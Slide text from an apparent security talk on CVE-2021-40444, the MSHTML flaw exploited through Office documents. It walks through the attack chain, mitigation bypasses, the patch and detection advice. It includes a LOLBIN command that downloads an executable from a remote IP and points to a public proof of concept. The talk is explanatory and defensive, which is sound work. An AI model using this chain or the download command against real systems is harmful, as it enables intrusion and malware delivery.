CVE 2021-40444: MSHTMHell

1. CVE 2021-40444
MSHTMHell

2. About Me
● Offensive security consultant at Kudelski Security
● Previous security consultant at Schneider Downs
● PAANG → 1-110th Infantry Battalion → Mt. Pleasant, PA
● Malware and threat intelligence “enthusiast”
● amartin@amartinsec.com / @amartinsec

3. “Typical” Office Phishing
● Payload as a macro
● NTLM Hash/Basic Authentication
Capture

4. CVE-2021-40444
● Users are taught to never enable macros from untrusted sources
● CVE-2021-40444 bypasses this by not using macros
● A user still has to enable editing for this exploit to work. While this still
requires user interaction, users aren't usually taught that this is a “bad thing”

5. Attack Chain
1. User opens document and enables editing
2. OLE (Object Linking and Embedding) in Word links to HTML file
using mhtml
3. Mshtml.dll renders the webpage through Internet Explorer Engine
4. Webpage contains some obfuscated JS that downloads a .cab file.
CAB file contains a .dll file with a .inf extension (setup information
file)
5. CAB file is extracted and .inf file is saved to the parent directory
due to a traversal vulnerability (ZipSlip discovered in 2018 by
Snyk)
6. Mshtml.dll executes .inf file using ActiveXObject via the .cpl: URI
scheme (control panel object) through control.exe. This causes
side-loading of the .inf (aka .dll) via rundll32.
a. This is a powerful undocumented “feature” of Internet Explorer
b. Other protocols can also be executed this was such as .doc,
.hta, etc.
7. Profit with a Cobalt Strike Beacon

6. The Payload Doc
● A Word document is a compressed document that can be unpacked to view
properties
● The Relationship file contains internal and external relationships unique to the
word document
● CVE-2021-40444 uses MSHTML (aka Trident) to download the webpage and
execute the ActiveX controls

7. LOLBINS
● Living Off The Land Binaries
● Built-in OS tools that allow us to perform malicious actions that look legitimate since we are
using native Window binaries such as download and execute
● Ex. excel.exe http://192.168.1.10/YouDontWantThis.exe → to download a file from the
command line
● https://lolbas-project.github.io/ → Windows
● https://gtfobins.github.io/ → Linux

8. LOLBINS Cont.
● CVE-2021-40444 uses control.exe to load a DLL into a Alternate Data Stream
(ADS)
● This (usually) drops Championship.inf to
C:UsersUserAppDataLocalTempchampionship.inf
● The ActiveX Object the attempts resolve the path to the .inf file

9. Deobfuscated HTML
● Padding is needed within the HTML file for execution → .cpl:123;
● The HTML file needs to be at least 4096 bytes to trigger (Will Dormann)

10. CAB File
● .cab (cabinet file) is a compression file that usually contains multiple files
● Most often seen in Windows updates (now it’s MSU’s)
● The .cab contains a malicious .DLL saved with the .INF extension
● Stored as ../championship.inf
● It is believed that the .inf is to throw off EDR detection instead of just having it
be a .dll

11. The two vulns that make CVE-2021-40444 possible
1. CAB Directory Traversal during extraction → ../championship.inf
2. File extensions as protocol → .cpl:DoSomeBadStuff.inf
Both are issues with MSHTML

12. In The Wild
● August 20 → Compilation date of CAB
malware sample
● September 1 → First identified by
@ShadowChasing1 on Twitter
● September 11 → public POC released to
GitHub by user lockedbyte. Builders quickly
started circulating malware forums
● September 14 → Microsoft releases patch

13. DEMO
https://github.com/lockedbyte/CVE-2021-40444

14. Expanding the Exploit
● Can be used in other Office formats such as .xlsx/.pptx and in .rtf files
● RTF’s will execute the payload in Explorer Preview Pane. A user doesn't even
have to open the file
● Before any patches were released, Microsoft recommended disabling untrusted
ActiveX in the environment. This was quickly bypassed by using .wsf: (Windows
Scripting Host File) that can contain VBScript and Jscript code
○ https://github.com/Edubr2020
● Can be delivered as a RAR to bypass “The mark of the web” for a true one click
exploit

15. Fix By Microsoft
● Patched the ../ directory traversal vulnerability
● Patched mshtml.dll to invalidate any URI with a “.” preceding it
○ This prevents .cpl: or other extensions from being treated as a protocol

16. Prevention
● Enable automatic Window updates
● Defender now detects any URI scheme that includes a period
● Any EDR should flag winword.exe that spawns a child process control.exe if
configured correctly

17. Side Note.
● Be cautious of what you send to cloud AV sandboxes: Ex. CWT / Ragnar Locker